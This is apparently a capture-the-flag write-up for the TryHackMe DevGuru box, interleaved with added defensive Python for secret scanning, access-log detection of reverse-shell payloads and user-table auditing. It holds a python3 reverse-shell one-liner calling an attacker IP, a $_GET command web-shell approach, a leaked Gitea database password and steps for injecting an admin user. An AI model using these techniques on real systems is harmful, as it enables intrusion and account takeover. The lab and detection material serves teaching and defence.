# TryHackMe-DevGuru
## NMAP
```
Nmap scan report for 10.10.172.205
Host is up (0.16s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 2a:46:e8:2b:01:ff:57:58:7a:5f:25:a4:d6:f2:89:8e (RSA)
| 256 08:79:93:9c:e3:b4:a4:be:80:ad:61:9d:d3:88:d2:84 (ECDSA)
|_ 256 9c:f9:88:d4:33:77:06:4e:d9:7c:39:17:3e:07:9c:bd (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: DevGuru
| http-git:
| 10.10.172.205:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
| Last commit message: first commit
| Remotes:
| http://devguru.local:8585/frank/devguru-website.git
|_ Project type: PHP application (guessed from .gitignore)
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Corp - DevGuru
8585/tcp open unknown
| fingerprint-strings:
| GenericLines:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 200 OK
| Content-Type: text/html; charset=UTF-8
| Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
| Set-Cookie: i_like_gitea=f886af904a2de78a; Path=/; HttpOnly
| Set-Cookie: _csrf=5bPJDT7tyJUhTZEjhejaOuL5wHU6MTYwNzE2ODk5ODQ5MDExOTg3MQ; Path=/; Expires=Sun, 06 Dec 2020 11:49:58 GMT; HttpOnly
| X-Frame-Options: SAMEORIGIN
| Date: Sat, 05 Dec 2020 11:49:58 GMT
|
| Gitea: Git with a cup of tea
|
| Page Not Found - Gitea: Git with a cup of tea
|_
```
There is nothing interesting on the web page itself. The nmap results, however, show an exposed `.git` directory, so let's visit it.

On visiting it we find a page that references the `master` branch.

So there is a git repository on the box; let's try to dump its files. We can use a tool called `GitTools` for that:

`https://github.com/internetwache/GitTools`

After running the tool, it took 22 minutes for me to dump the `.git` directory.

The raw dump is not directly readable, so to recover useful files we have to use `Extractor` from GitTools.

First move the dumped `.git` folder into another folder, then run the tool.

As you can see, it recovers a bunch of files, which makes our work way easier.

Reading through `.htaccess` we find that there is a database login page.

Going back to the extracted `.git` folder, we find `config/database.php`, which contains credentials for the MySQL database.
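The `config/database.php` find above is the classic case of credentials committed to a repository and then exposed with the repository. The following is an added example, not part of this write-up or of GitTools: a small Python secret scanner of the kind a defender runs over a checkout (or as a pre-commit hook) to catch literal passwords in PHP config arrays and INI files. The sample configs, the key names it looks for and the file paths are constructed for the example; the safe Laravel form `env('DB_PASSWORD')` is deliberately not flagged because the value is not a quoted literal.

```python
import re
from typing import Dict, List, Tuple

# Credential-bearing settings in the two config formats seen on this box:
# Laravel/OctoberCMS-style PHP arrays ('password' => 'literal') and
# Gitea-style INI assignments (PASSWD = literal). Key names are a constructed
# starting list for this example; extend them for your own stack.
SECRET_PATTERNS = [
    ("php-array", re.compile(
        r"""['"](?P<key>password|passwd|secret|api_key|token)['"]\s*=>\s*['"](?P<val>[^'"]*)['"]""",
        re.IGNORECASE)),
    ("ini-assign", re.compile(
        r"""^[ \t]*(?P<key>PASSWD|PASSWORD|SECRET_KEY|INTERNAL_TOKEN)[ \t]*=[ \t]*(?P<val>\S+)""",
        re.IGNORECASE | re.MULTILINE)),
]


def mask(value: str) -> str:
    """Keep only the first two characters so the report does not leak the secret again."""
    return value[:2] + "*" * max(len(value) - 2, 0)


def find_secrets(path: str, text: str) -> List[Tuple[str, int, str, str]]:
    """Return (path, line_number, key, masked_value) for every literal secret in text.

    Empty and 'null' values are ignored. The Laravel form
    'password' => env('DB_PASSWORD') never matches because env(...) is not a quoted literal,
    and INI comment lines (starting with ';') never match because the pattern is anchored
    at the start of the line.
    """
    hits = []
    for _name, pattern in SECRET_PATTERNS:
        for m in pattern.finditer(text):
            value = m.group("val")
            if value.strip().lower() in ("", "null"):
                continue
            line_no = text.count("\n", 0, m.start()) + 1
            hits.append((path, line_no, m.group("key"), mask(value)))
    return sorted(hits, key=lambda h: h[1])


def scan_files(files: Dict[str, str]) -> List[Tuple[str, int, str, str]]:
    """Scan a mapping of path -> contents (e.g. built with os.walk over a checkout)."""
    results = []
    for path, text in files.items():
        results.extend(find_secrets(path, text))
    return results


# Constructed samples for this example (not the real files from the box).
BAD_PHP_CONFIG = """<?php
return [
    'connections' => [
        'mysql' => [
            'host'     => 'localhost',
            'database' => 'octoberdb',
            'username' => 'october',
            'password' => 'constructed-example-pass',
        ],
    ],
];
"""

# Same file with the password read from the environment instead of hard-coded.
SAFE_PHP_CONFIG = BAD_PHP_CONFIG.replace("'constructed-example-pass'", "env('DB_PASSWORD', '')")

GITEA_INI = """[database]
DB_TYPE = mysql
HOST = 127.0.0.1:3306
NAME = gitea
USER = gitea
; Use PASSWD = `your password` for quoting if you use special characters in the password.
PASSWD = constructed-example-pass
"""

if __name__ == "__main__":
    for hit in scan_files({"config/database.php": BAD_PHP_CONFIG,
                           "custom/conf/app.ini": GITEA_INI}):
        print("%s:%d  %s = %s" % hit)
```

Run it as a script to see the two findings; `SAFE_PHP_CONFIG` produces none, which is the state a committed config file should be in.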
With those credentials we can log in. Great!

Now, `OctoberCMS` blocks uploads of `php` files; you could try changing the extension to `.php3`, `.php4`, `.php5` or `.phtml`, but that won't work either. What we can do instead is run PHP code from within CMS pages:

`https://octobercms.com/forum/post/running-php-code-on-pages`

This post explains how that is done.

As we can see, it does run PHP code, so now we have to craft a PHP reverse shell to get onto the box. Let's first test this with a simple `$_GET["command"]`.

We can run system commands, so the only thing left to do is set up a netcat listener and run a reverse shell command through that parameter. I am going to use a python3 reverse shell because python3 is installed on the box:
```
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.2.54.209",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```
And we finally got a shell, sweet!
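From the defender's side, both the `$_GET["command"]` test and the reverse-shell call above leave a trace in the Apache access log. The block below is an added example, not from this write-up: it parses constructed combined-format log lines, URL-decodes the query string, and flags requests that carry a command-style parameter name or fragments of the one-liner above. The parameter names, signature strings and log lines are assumptions made for this example.

```python
import re
from typing import Dict, List
from urllib.parse import parse_qsl, urlsplit

# Apache "combined" access log line (format assumption for this example).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Parameter names commonly wired to system()/shell_exec() in a web shell,
# and fragments of the python3 one-liner used above. Constructed lists.
SUSPICIOUS_PARAMS = {"cmd", "command", "exec", "shell", "run"}
PAYLOAD_SIGNS = ["python3 -c", "python -c", "socket.socket", "os.dup2",
                 "/bin/sh", "/bin/bash", "bash -i", "nc -e", "subprocess"]


def analyse_line(line: str) -> Dict[str, object]:
    """Return {"ip", "target", "reasons"}; reasons is empty for a benign request."""
    m = LOG_RE.match(line)
    if not m:
        return {"ip": None, "target": None, "reasons": ["unparsable"]}
    reasons: List[str] = []
    query = urlsplit(m.group("target")).query
    # parse_qsl percent-decodes values and turns '+' into spaces, so the
    # signatures are matched against what PHP actually received.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name.lower() in SUSPICIOUS_PARAMS:
            reasons.append("param:" + name.lower())
        low = value.lower()
        for sign in PAYLOAD_SIGNS:
            if sign in low:
                reasons.append("payload:" + sign)
    return {"ip": m.group("ip"), "target": m.group("target"), "reasons": reasons}


def scan_log(text: str) -> List[Dict[str, object]]:
    """Return the analysis of every non-empty line that raised at least one reason."""
    alerts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        result = analyse_line(line)
        if result["reasons"]:
            alerts.append(result)
    return alerts


# Constructed sample log (not captured from the box). The last line carries a
# truncated, URL-encoded copy of the one-liner's opening, as a web server would log it.
SAMPLE_LOG = """\
10.0.0.5 - - [05/Dec/2020:11:49:58 +0000] "GET /about HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.5 - - [05/Dec/2020:11:50:10 +0000] "GET /?q=hello+world HTTP/1.1" 200 3180 "-" "Mozilla/5.0"
10.0.0.9 - - [05/Dec/2020:11:52:01 +0000] "GET /test?command=id HTTP/1.1" 200 64 "-" "curl/7.68.0"
10.0.0.9 - - [05/Dec/2020:11:53:44 +0000] "GET /test?command=python3+-c+%27import+socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket%28%29%27 HTTP/1.1" 200 0 "-" "curl/7.68.0"
"""

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert["ip"], alert["target"][:60], alert["reasons"])
```

Only the two requests to `/test` are reported; the benign `?q=` search is decoded the same way but matches nothing. In practice the parameter list is the noisy part and the decoded-payload signatures are the high-confidence part, so treat a `payload:` reason as the one worth paging on.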
Now we must enumerate the box. To do that, transfer `linpeas` to the target by serving it with a Python HTTP server.

During the enumeration process we find some interesting backup files.

Here we can see that there is another database for `gitea`, which is running on port 8585. Also, looking at the bottom, we find that Gitea can use three password hashing algorithms: `bcrypt`, `pbkdf2` and `scrypt`.

So let's log in to the database like we did with `octoberdb`.

Here I cloned the `frank` user but added a `bcrypt` password for him because with `pbkdf2` it was not allowing me to log in.
```
DB_TYPE = mysql
HOST = 127.0.0.1:3306
NAME = gitea
USER = gitea
; Use PASSWD = `your password` for quoting if you use special characters in the password.
PASSWD = UfFPTF8C8jjxVF2m
```
--------
Here we can find the password hash for `frank`; it is stored as bcrypt, as the `$2` prefix shows. Rather than trying to crack the hash, we can simply add a user whose password is hashed with `bcrypt`.

If we then log in with that user, we can access the `OctoberCMS` dashboard.

Going to `Settings` and then `Event log`, we can see there is an image.
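Both the cloned `frank` account in Gitea and the extra backend user added to OctoberCMS come down to the same thing: a new or altered row in the application's user table, which is exactly what a routine audit should notice. The following added example, not from this write-up, models an OctoberCMS-style `backend_users` table in SQLite as a stand-in for MySQL (the column set `login`, `password`, `is_superuser`, `created_at` and all rows are constructed assumptions) and reports accounts that are not in a known admin list, were created after a baseline timestamp, or do not carry a bcrypt-style `$2...$` prefix. The same three checks apply to Gitea's user table with its own column names.

```python
import re
import sqlite3
from typing import Iterable, List, Tuple

# bcrypt hashes look like $2y$10$<22-char salt><31-char hash>; OctoberCMS uses
# Laravel's hasher, whose default is bcrypt. This is a prefix check only and
# does not verify the hash itself.
BCRYPT_RE = re.compile(r"^\$2[aby]?\$\d{2}\$")


def hash_algo(stored: str) -> str:
    """Classify a stored password hash by its prefix."""
    if BCRYPT_RE.match(stored):
        return "bcrypt"
    if stored.startswith("$argon2"):
        return "argon2"
    return "unknown"


def build_sample_db() -> sqlite3.Connection:
    """SQLite stand-in for the MySQL backend_users table; every row is constructed."""
    conn = sqlite3.connect(":memory:")
    conn.execute("""CREATE TABLE backend_users (
        id INTEGER PRIMARY KEY, login TEXT, password TEXT,
        is_superuser INTEGER, created_at TEXT)""")
    rows = [
        # The 'x'/'y'/'z' runs stand in for hash bodies; they are not real hashes.
        (1, "frank", "$2y$10$" + "x" * 53, 1, "2020-06-01 09:00:00"),
        (2, "helper", "$2y$10$" + "y" * 53, 0, "2020-06-02 09:00:00"),
        (3, "backdoor", "$2y$10$" + "z" * 53, 1, "2020-12-05 11:55:00"),  # appeared after baseline
    ]
    conn.executemany("INSERT INTO backend_users VALUES (?,?,?,?,?)", rows)
    return conn


def audit_backend_users(conn: sqlite3.Connection, known_logins: Iterable[str],
                        baseline: str) -> List[Tuple[str, str]]:
    """Return (login, reason) for accounts that are unknown, newer than the
    baseline timestamp ('YYYY-MM-DD HH:MM:SS', compared lexically), or not bcrypt."""
    known = set(known_logins)
    findings = []
    cur = conn.execute("SELECT login, password, is_superuser, created_at FROM backend_users")
    for login, password, is_superuser, created_at in cur:
        if login not in known:
            findings.append((login, "not in known admin list" + (" (superuser)" if is_superuser else "")))
        if created_at > baseline:
            findings.append((login, "created after baseline " + baseline))
        algo = hash_algo(password)
        if algo != "bcrypt":
            findings.append((login, "unexpected hash format: " + algo))
    return findings


if __name__ == "__main__":
    db = build_sample_db()
    for login, reason in audit_backend_users(db, {"frank", "helper"}, "2020-12-01 00:00:00"):
        print(login, "->", reason)
```

The baseline is the last time the admin list was reviewed; any row newer than it, or any login the reviewer does not recognise, is a candidate for the kind of account this write-up adds. Point the same query at a real MySQL connection (for example via `mysql.connector`, an assumption of your environment) by swapping the connection object, since the SQL and the checks do not change.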